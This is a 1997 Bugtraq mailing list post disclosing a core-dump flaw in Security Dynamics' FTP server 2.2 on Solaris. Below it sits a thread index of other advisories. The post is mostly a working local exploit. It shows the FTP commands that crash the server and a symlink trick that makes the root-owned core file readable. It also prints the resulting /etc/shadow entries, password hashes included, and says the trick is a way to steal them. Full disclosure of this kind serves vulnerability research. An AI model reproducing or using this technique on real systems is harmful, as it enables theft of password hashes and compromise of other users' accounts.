Bugtraq mailing list archives
Bug In Security Dynamics' FTP server (Version 2.2)
From: sp00n () COUPLER 300BAUD COM (sp00n)
Date: Wed, 12 Nov 1997 11:56:29 -0500
Hi, This bug is similar to the solaris and other ftp core dump bugs, slightly diffrent though. BTW the machine is a SPARC 20 running 2.5, You can link files and clobber them with a core to annoy your local sys admin or, even better get /etc/shadow, u get the point... anyways 220 cornholio Security Dynamics' FTP server (Version 2.2) ready. Name (.:joeuser): joeuser 331 Password required for mpotter. Password: 230 User joeuser logged in. ftp> cd /tmp 250 CWD command successful. ftp> user root DUMP_CORE_FTPD 331 Password required for root. 530 Login incorrect. Login failed. ftp> quote pasv 421 Service not available, remote server has closed connection ftp> quit $ ls -la core -rw-r----- 1 root network 264656 Nov 12 11:14 core At least it dosent dump 666 like solaris's in.ftpd :) But I cant read it :( Not too usefull You say? welp prior to dumping the core you should link it to ps_data or something like that then you will get this lrwxrwxrwx 1 joeuser network 7 Nov 12 11:07 core -> ps_data -rw-rw-r-- 1 root sys 264656 Nov 12 11:07 ps_data $file ps_data ps_data: ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd' $strings core | more noaccess:*LK*:6445:::::: sp00n:o.IZGdC5eBTtKY:10175:7:28:::: root:aiqzotPNtTsI:9988:::::: user2:U6d5srjcJi/KU:9952:::::: joeuser:ktxVoVPQVIgc.:10175:7:28:::: root::0:root other::1: bin::2:root,daemon sys::3:root,bin,adm adm::4:root,daemon uucp::5:root
Current thread:
- Re: Vunerability in Lizards game, (continued)
- Re: Vunerability in Lizards game Joe Zbiciak (Nov 18)
- Re: Vunerability in Lizards game Zoltan Hidvegi (Nov 18)
- Major Security Flaw in Cybercash 2.1.2 Kerri Kraft (Nov 19)
- IP DOS attacks -- Win95 and WinNT Paul Leach (Nov 18)
- Updating microcode on the fly Superuser (Nov 12)
- Re: Updating microcode on the fly Jyri Kaljundi (Nov 12)
- solaris 251 & syslogd Michael Helm (Nov 12)
- Re: solaris 251 & syslogd Richard Peters (Nov 12)
- Re: solaris 251 & syslogd Dave Kinchlea (Nov 12)
- CERT Advisory CA-97.25 - REVISED- Code Correction Aleph One (Nov 12)
- Bug In Security Dynamics' FTP server (Version 2.2) sp00n (Nov 12)
- Intel Pentium Bug: BSDI Releases a patch Joe Ilacqua (Nov 11)
- Re: Intel Pentium Bug Kragen \ (Nov 10)
- Possible solution: [Fwd: I figured out how to make my Pentium Miguel Angel Rodriguez Jodar (Nov 10)
- Re: Intel Pentium Bug Tim Newsham (Nov 10)
- CERT Advisory CA-97.25 - CGI_metachar Aleph One (Nov 10)
- Re: CERT Advisory CA-97.25 - CGI_metachar Greg Bacon (Nov 11)
- L0pht Advisory: IE4.0 Petri Helenius (Nov 10)
- Cisco IOS password encryption facts John Bashinski (Nov 10)